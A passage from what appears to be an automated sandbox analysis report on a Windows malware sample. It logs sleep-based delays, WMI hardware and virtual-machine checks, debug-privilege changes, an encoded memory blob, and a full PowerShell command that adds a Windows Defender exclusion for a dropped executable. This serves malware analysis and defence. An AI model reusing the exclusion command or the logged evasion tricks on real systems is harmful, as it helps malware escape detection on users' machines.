                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594438s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594313s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594198s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594078s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593969s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593844s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593735s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593610s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593485s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593360s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593250s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -593141s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592985s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592846s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592610s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592485s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592375s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592266s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592157s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -592032s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591903s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591797s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591688s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591578s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591468s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591360s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591235s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -591110s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 1984Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7500Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599671Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599453Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99883Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99766Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99657Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99544Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99422Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99313Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99199Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 99084Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98954Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98829Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98704Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98579Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98454Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98329Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98204Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 98094Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 97954Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597229Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597094Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596969Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596794Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596617Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 30000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 599853
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598907
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598203
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597344
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597094
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596938
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596766
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596640
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596531
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596422
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596259
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596107
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595954
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595828
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595580
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595014
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594313
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594198
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594078
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593969
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593844
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593735
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593250
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593141
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592985
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592846
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592375
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592157
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592032
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591903
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591578
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591468
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591235
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591110
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766850936.000000001B9CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: W4tW72sfAD.exe, juptXkyeRvGsIZrQGeVEsrnWhD.exe0.0.drBinary or memory string: EE8hgfsJKrIo2qFkM8q
                          Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2590137351.000000001347E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ahUIjoAYzyQSo/qBDk6lKAXBI8BsAaYAlr7t6agxG0DUK3kAGtflh4dGk5lq8hwLueGmhiOxqPD0S7wu0G2OjnIoOI0MEblNyT69AmGtaa3whIwOLx2ZHhtHzlw285YYojSwHWj/cn42iFYIpAxlbICCowO50qCvQIbbb19sC+lmy2haDc6b6A3kSY0a+Oc4i4Ek1t6mBjLtkXT0B5Ix17TF6nhFFHtq2hKJLI+xiE9VqcGk/g0HCNG/WPQYBw6HR8ZGBjtGRpOG72xPBndOpjKgJtksABqRGZq0shke43bcj23+US6M5HekYSK6zMgZVmeTCewNklO8jkjo9eBdwB0fsZwxgxbCkYDhrmiP7oVCtLfmxnjlaHxxN7IGJ60MtEPw0HKs52YMXpwyre7YFVMDGfIw4whhmqkBkExW9u7HSrJUvwBE9En7aK+bSA5zNp2Amgn5wCThZmEpfmjbXBHMp0aRK28iiPpNOJQqxwU/WxDKgXqcWSx9B0JfII3QPZhGLEdiTX4Z8MMV0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                          Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2747066121.000000001BE9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2590137351.00000000134F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                          Source: W4tW72sfAD.exe, 00000000.00000002.1775712295.000000001C03B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
